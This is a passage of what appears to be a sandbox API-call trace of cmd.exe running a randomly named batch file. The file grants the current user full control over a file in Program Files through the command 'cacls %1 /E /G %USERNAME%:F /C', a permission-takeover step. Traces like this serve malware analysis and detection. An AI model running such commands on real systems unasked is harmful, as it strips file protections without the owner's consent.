HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3aef20*="Ch81ANBE.bat") returned 0x32 [0133.094] SetErrorMode (uMode=0x0) returned 0x1 [0133.095] GetProcessHeap () returned 0x440000 [0133.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x72) returned 0x450fe0 [0133.095] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"", _Control=" \x09") returned 0x1 [0133.095] GetProcessHeap () returned 0x440000 [0133.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x76) returned 0x451060 [0133.095] GetProcessHeap () returned 0x440000 [0133.095] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe4) returned 0x4410c0 [0133.095] GetProcessHeap () returned 0x440000 [0133.095] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4410c0, Size=0x78) returned 0x4410c0 [0133.095] GetProcessHeap () returned 0x440000 [0133.095] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4410c0) returned 0x78 [0133.095] CmdBatNotification () returned 0x455192 [0133.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0133.096] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0133.096] _get_osfhandle (_FileHandle=3) returned 0x78 [0133.096] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.096] _get_osfhandle (_FileHandle=3) returned 0x78 [0133.096] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.097] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3aef48, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3aef48*=0xe2, lpOverlapped=0x0) returned 1 [0135.776] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0135.776] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0135.778] _get_osfhandle (_FileHandle=3) returned 0x78 [0135.779] GetFileType (hFile=0x78) returned 0x1 [0135.779] _get_osfhandle (_FileHandle=3) returned 0x78 [0135.779] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0135.779] GetProcessHeap () returned 0x440000 [0135.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x458a70 [0135.779] GetProcessHeap () returned 0x440000 [0135.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4008) returned 0x464aa8 [0135.780] GetProcessHeap () returned 0x440000 [0135.780] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1a) returned 0x4577c0 [0135.780] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0135.780] GetProcessHeap () returned 0x440000 [0135.781] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4577c0 | out: hHeap=0x440000) returned 1 [0135.781] GetProcessHeap () returned 0x440000 [0135.781] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x464aa8 | out: hHeap=0x440000) returned 1 [0135.781] GetProcessHeap () returned 0x440000 [0135.781] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a70 | out: hHeap=0x440000) returned 1 [0135.782] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0135.782] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0135.783] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0135.783] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0135.783] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0135.783] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0135.783] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0135.783] GetProcessHeap () returned 0x440000 [0135.783] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x441140 [0135.783] GetProcessHeap () returned 0x440000 [0135.783] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x14) returned 0x4411a0 [0135.789] GetProcessHeap () returned 0x440000 [0135.789] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb8) returned 0x4411c0 [0135.791] _tell (_FileHandle=3) returned 32 [0135.792] _close (_FileHandle=3) returned 0 [0135.792] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aed1c | out: _Buffer="\r\n") returned 2 [0135.792] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.792] GetFileType (hFile=0x7) returned 0x2 [0136.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.032] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aecdc | out: lpMode=0x3aecdc) returned 1 [0136.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.099] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aed08, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aed08*=0x2) returned 1 [0136.114] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0136.114] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.114] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3aed18 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0136.114] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3aed18 | out: _Buffer=">") returned 1 [0136.114] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.114] GetFileType (hFile=0x7) returned 0x2 [0136.115] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.115] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aece0 | out: lpMode=0x3aece0) returned 1 [0136.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3aed0c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3aed0c*=0x26) returned 1 [0136.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.117] GetFileType (hFile=0x7) returned 0x2 [0136.141] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.141] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef64 | out: lpMode=0x3aef64) returned 1 [0136.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.149] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4411a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3aef90, lpReserved=0x0 | out: lpBuffer=0x4411a8*, lpNumberOfCharsWritten=0x3aef90*=0x5) returned 1 [0136.150] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3aef9c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 88 [0136.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.150] GetFileType (hFile=0x7) returned 0x2 [0136.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.150] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef5c | out: lpMode=0x3aef5c) returned 1 [0136.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.151] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x3aef88, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aef88*=0x58) returned 1 [0136.151] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3aefbc | out: _Buffer="\r\n") returned 2 [0136.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.151] GetFileType (hFile=0x7) returned 0x2 [0136.151] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.151] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3aef7c | out: lpMode=0x3aef7c) returned 1 [0136.152] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.152] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3aefa8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3aefa8*=0x2) returned 1 [0136.152] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0136.153] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0136.153] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0136.153] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0136.153] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0136.153] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0136.153] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0136.153] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0136.153] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0136.153] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0136.153] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0136.153] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0136.153] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0136.153] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0136.153] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0136.153] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0136.154] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0136.154] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0136.154] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0136.154] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0136.154] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0136.154] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0136.154] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0136.154] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0136.154] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0136.154] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0136.154] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0136.154] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0136.156] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0136.156] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0136.156] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0136.156] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0136.156] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0136.156] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0136.156] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0136.156] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0136.156] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0136.156] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0136.156] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0136.156] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0136.156] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0136.156] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0136.157] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0136.157] GetProcessHeap () returned 0x440000 [0136.157] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x418) returned 0x4560f0 [0136.157] SetErrorMode (uMode=0x0) returned 0x0 [0136.157] SetErrorMode (uMode=0x1) returned 0x0 [0136.157] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4560f8, lpFilePart=0x3aed60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3aed60*="Desktop") returned 0x25 [0136.158] SetErrorMode (uMode=0x0) returned 0x1 [0136.158] GetProcessHeap () returned 0x440000 [0136.158] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4560f0, Size=0x60) returned 0x4560f0 [0136.158] GetProcessHeap () returned 0x440000 [0136.158] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4560f0) returned 0x60 [0136.158] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.158] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.158] GetProcessHeap () returned 0x440000 [0136.158] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x120) returned 0x456158 [0136.158] GetProcessHeap () returned 0x440000 [0136.158] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x238) returned 0x456280 [0136.163] GetProcessHeap () returned 0x440000 [0136.163] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x456280, Size=0x122) returned 0x456280 [0136.163] GetProcessHeap () returned 0x440000 [0136.163] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x456280) returned 0x122 [0136.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.163] GetProcessHeap () returned 0x440000 [0136.163] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x4563b0 [0136.163] GetProcessHeap () returned 0x440000 [0136.163] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4563b0, Size=0x76) returned 0x4563b0 [0136.163] GetProcessHeap () returned 0x440000 [0136.163] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4563b0) returned 0x76 [0136.164] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.164] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3aeadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeadc) returned 0xffffffff [0136.164] GetLastError () returned 0x2 [0136.164] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x3aeadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeadc) returned 0xffffffff [0136.165] GetLastError () returned 0x2 [0136.165] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.165] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3aeadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeadc) returned 0x441280 [0136.165] GetProcessHeap () returned 0x440000 [0136.165] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4555c0, Size=0x4) returned 0x4555c0 [0136.165] FindClose (in: hFindFile=0x441280 | out: hFindFile=0x441280) returned 1 [0136.166] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x3aeadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeadc) returned 0xffffffff [0136.166] GetLastError () returned 0x2 [0136.166] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x3aeadc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3aeadc) returned 0x441280 [0136.166] FindClose (in: hFindFile=0x441280 | out: hFindFile=0x441280) returned 1 [0136.166] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.166] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.166] GetConsoleTitleW (in: lpConsoleTitle=0x3aeb2c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.168] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x456720, lpFilePart=0x3ae64c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ae64c*="Desktop") returned 0x25 [0136.168] SetErrorMode (uMode=0x0) returned 0x1 [0136.168] GetProcessHeap () returned 0x440000 [0136.169] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x456718, Size=0x60) returned 0x456718 [0136.169] GetProcessHeap () returned 0x440000 [0136.169] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x456718) returned 0x60 [0136.169] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.169] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.169] GetProcessHeap () returned 0x440000 [0136.169] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x120) returned 0x456780 [0136.170] GetProcessHeap () returned 0x440000 [0136.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x238) returned 0x4568a8 [0136.170] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4568a8, Size=0x122) returned 0x4568a8 [0136.170] GetProcessHeap () returned 0x440000 [0136.170] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4568a8) returned 0x122 [0136.170] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.170] GetProcessHeap () returned 0x440000 [0136.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe0) returned 0x4569d8 [0136.171] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x4569d8, Size=0x76) returned 0x4569d8 [0136.171] GetProcessHeap () returned 0x440000 [0136.171] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x4569d8) returned 0x76 [0136.171] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.171] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3ae3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae3c8) returned 0xffffffff [0136.172] GetLastError () returned 0x2 [0136.172] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x3ae3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae3c8) returned 0xffffffff [0136.172] GetLastError () returned 0x2 [0136.172] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.172] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x3ae3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae3c8) returned 0x441280 [0136.173] FindClose (in: hFindFile=0x441280 | out: hFindFile=0x441280) returned 1 [0136.173] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x3ae3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae3c8) returned 0xffffffff [0136.173] GetLastError () returned 0x2 [0136.173] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ae3c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ae3c8) returned 0x441280 [0136.173] FindClose (in: hFindFile=0x441280 | out: hFindFile=0x441280) returned 1 [0136.174] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.174] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.174] GetConsoleTitleW (in: lpConsoleTitle=0x3ae8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.201] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ae748, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ae810 | out: lpAttributeList=0x3ae748, lpSize=0x3ae810) returned 1 [0136.202] UpdateProcThreadAttribute (in: lpAttributeList=0x3ae748, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ae808, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ae748, lpPreviousValue=0x0) returned 1 [0136.202] GetStartupInfoW (in: lpStartupInfo=0x3ae704 | out: lpStartupInfo=0x3ae704*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0136.202] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.204] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3ae7a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ae7f0 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x3ae7f0*(hProcess=0x74, hThread=0x78, dwProcessId=0xaa8, dwThreadId=0xa84)) returned 1 [0136.624] CloseHandle (hObject=0x78) returned 1 [0136.624] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.624] GetProcessHeap () returned 0x440000 [0136.624] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457f30 | out: hHeap=0x440000) returned 1 [0136.624] GetEnvironmentStringsW () returned 0x456b80* [0136.624] GetProcessHeap () returned 0x440000 [0136.624] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb36) returned 0x457f30 [0136.624] FreeEnvironmentStringsW (penv=0x456b80) returned 1 [0136.624] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0155.486] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3ae6e4 | out: lpExitCode=0x3ae6e4*=0x1f57) returned 1 [0155.486] CloseHandle (hObject=0x74) returned 1 [0155.486] _vsnwprintf (in: _Buffer=0x3ae82c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ae6f0 | out: _Buffer="00001F57") returned 8 [0155.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0155.487] GetProcessHeap () returned 0x440000 [0155.487] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x457f30 | out: hHeap=0x440000) returned 1 [0155.487] GetEnvironmentStringsW () returned 0x457f30* [0155.487] GetProcessHeap () returned 0x440000 [0155.487] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x458a98 [0155.487] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0155.487] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0155.487] GetProcessHeap () returned 0x440000 [0155.487] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458a98 | out: hHeap=0x440000) returned 1 [0155.487] GetEnvironmentStringsW () returned 0x457f30* [0155.487] GetProcessHeap () returned 0x440000 [0155.487] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xb5c) returned 0x458a98 [0155.488] FreeEnvironmentStringsW (penv=0x457f30) returned 1 [0155.488] GetProcessHeap () returned 0x440000 [0155.488] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x440d38 | out: hHeap=0x440000) returned 1 [0155.488] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ae748 | out: lpAttributeList=0x3ae748) [0155.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.488] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0155.488] _get_osfhandle (_FileHandle=1) returned 0x7 [0155.488] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0155.489] _get_osfhandle (_FileHandle=0) returned 0x3 [0155.489] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0155.489] SetConsoleInputExeNameW () returned 0x1 [0155.489] GetConsoleOutputCP () returned 0x1b5 [0155.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0155.489] SetThreadUILanguage (LangId=0x0) returned 0x409 [0155.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3aef64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0155.490] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0155.490] _get_osfhandle (_FileHandle=3) returned 0x74 [0155.490] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0155.490] GetProcessHeap () returned 0x440000 [0155.490] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4569d8 | out: hHeap=0x440000) returned 1 [0155.490] GetProcessHeap () returned 0x440000 [0155.490] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4568a8 | out: hHeap=0x440000) returned 1 [0155.490] GetProcessHeap () returned 0x440000 [0155.490] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456780 | out: hHeap=0x440000) returned 1 [0155.490] GetProcessHeap () returned 0x440000 [0155.491] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x456718 | out: hHeap=0x440000) returned 1 